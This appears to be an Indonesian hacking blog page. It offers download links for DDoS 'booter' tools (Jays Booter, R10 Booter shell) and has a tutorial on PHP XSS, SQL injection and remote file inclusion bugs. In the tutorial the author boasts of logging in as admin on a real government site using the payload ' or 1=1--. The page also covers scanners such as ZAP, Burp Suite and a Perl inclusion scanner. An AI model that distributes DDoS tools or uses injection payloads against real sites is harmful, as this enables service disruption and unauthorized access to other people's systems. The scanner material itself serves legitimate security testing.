11. Jika settingannya sudah mirip seperti gambar diatas. Maka, tunggu dulu 10-15 menit untuk domain .TK yg baru didaftar. Tetapi, jika domain .TK nya sudah lama didaftar maka kita cukup menunggu beberapa detik saja :D setelah itu, baru kita bisa mengeklik "simpan/save" pada blogger :).

0 komentar:

Minggu, 18 Agustus 2013

Jays Booter v6

DOWNLOAD : here


0 komentar:

R10 BOOTER SHELL V5 DDOS

Mau share tools ddos :) R10 Booter shell v5 nih :)

LINK : disini


0 komentar:

Cek Bug PHP Script





Setelah terampungkan script php yang telah kita buat ada? kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah? siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat? dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi? system. 
???
Dan siapa sangka script php yang telah dibuat itu aman? dari kerentanan dalam masalah security. :D~~~ 
???
Lalu, bagaimana mencegah sang hacker mengekploitasi,? bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui? script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua? ??? :D

Sebelum kita beralih maju ke langkah selanjutnya ada? baiknya untuk mengenali bug popular yang paling sering diexploitasi.
Penulis akan mencoba untuk memberikan sedikit penjelasan,? bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content? Management system maupun yang lainnya. Di antaranya :
- XSS ( Cross Site Scripting )- SQL Injection
- RFI ( Remote File Inclusion )
Cross Site Scriping 
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi? karena tidak adanya filtering pada html maupun java script. 
?
Tetapi pada dasarnya defacing ( perubahan kontent ) hanya? terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat? mencuri cookie? kemudian menggunakannya? untuk berbuat sesuatu yang … :D~~
?
Contohnya :
Sensored [ maaf ]
SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker? yang mencoba melakukan inject query sql?? melalui form ataupun via address bar pada browser internet.? Sebagai contohnya ketika penulis mencoba login? sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id? ).? Dengan menggunakan query ‘ or 1=1–? penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1– itu? berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh? server sql adalah menjalankan query ” select * “. Yang terjadi adalah? penulis diloloskan untuk login sebagai admin. 
???
Berikut adalah gambar yang penulis capture ketika penulis? berhasil login sebagai admin pada situshttp://www.sumsel.go.id
Gambar ini diambil sebelum penulis mengontak webmaster? via email untuk mempatch script phpnya.
???
RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika? melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.? Apabila user memasukkan url evil script miliknya pada variable yang digunakan? dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut? dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan? command di server milik anda untuk merubah konten situs atau bahkan merusaknya.? :D~~
Untuk contohnya silahkan anda cari di www.milw0rm.com :D~
Keywordnya Remote File Inclusion. :D~
Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm? … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat? secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara? tidak sengaja maupun sengaja. :D~
???
Pada dasarnya untuk mengecek bug dapat dilakukan secara? online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di? localhost anda ( offline ) saja.
Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda? adalah sebuah addons mozilla firefox yang disediakan secara gratis.? Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.
???
Tools tersebut dapat? anda download disini :

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi
Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection? digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena? penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax? sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah? digunakan telah disediakan untuk melakukan cek bug sql injection. :D 
???
Anda dapat mendownloadnya disini : 
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi
Penggunaanya pun tidak terlalu sulit.
Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler? interpreter ini nantinya digunakan untuk menjalankan script? inclusionscanner.pl. 
Dan kemudian copykan inclusionscanner.pl tersebut ke? direktori c:perlbin
Langkah selanjutnya :
1. Masukkan? script? yang akan anda scan kedalam sebuah direktori di c:perl php.
ex : c:perlwordpress.
2. Masuk ke command prompt, start | run | cmd | enter
3.? Setelah itu? masuk ke direktory c:perlbin, cd c:perlbin
4. Jalankan scriptnya,
C:Perlbin>perl.exe inclusionscanner.pl
#Will check a directory for all includes and unsets
#Coded by Ironfist (ironsecurity.nl)
#Usage: create a folder in your perlfolder and put the? files to be scanned in it
, next type the folder name below (eg myfolder)
#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)
?
Directory to read? c:perlwp
?
kemudian lihat hasilnya di c:perlbinresult.html
?
berikut hasil scan ketika penulis mencoba untuk melakukan? cek inclusion pada wordpress-2.3.3 :
???
FOUND: require_once($locale_file);
? in c:perlwp/wp-settings.php FOUND:? require_once($import_root . ‘/’ . $file);
? in c:perlwp/wp-admin/import.php FOUND:? include_once($this->PluginDir . “class-smtp.php”);
? in c:perlwp/wp-includes/class-phpmailer.php FOUND:? include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);
? in c:perlwp/wp-includes/class-phpmailer.php FOUND:? include($lang_path.’phpmailer.lang-en.php’);
? in c:perlwp/wp-includes/class-phpmailer.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? include($template);
? in c:perlwp/wp-includes/template-loader.php FOUND:? require_once($_template_file);
in c:perlwp/wp-includes/theme.php
woww !!! :D~~ silahkan di exploitasi eh di patch script? milik anda. :D~~
Ingat, jangan merusak :* 


0 komentar:

Menemukan Kerentanan dalam aplikasi Web Dengan ZED ATTACK PROXY (ZAP)

(ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.


Fitur Utama:
  1. Intercepting Proxy
  2. Active scanner
  3. Passive scanner
  4. Brute Force scanner
  5. Spider
  6. Fuzzer
  7. Port Scanner
  8. Dynamic SSL certificates
  9. API
  10. Beanshell integration

0 komentar:

MENGUJI KEAMANAN APLIKASI WEB DENGAN BURP SUITE

Burp Suite adalah alat yang sangat bagus sekali untuk pengujian keamanan aplikasi web. Alat ini sangat bagus untuk pentester dan peneliti keamanan. Ini berisi berbagai alat dengan antarmuka banyak di antara mereka yang dirancang untuk memudahkan dan mempercepat proses menyerang aplikasi website.


Fungsi Umum:
  1. Intersepsi proxy
  2. Radar crawling dan spider
  3. Webapps scanner
  4. Alat penyerangan
  5. Repeater dan sequencer tools




creator: Byte-007

0 komentar: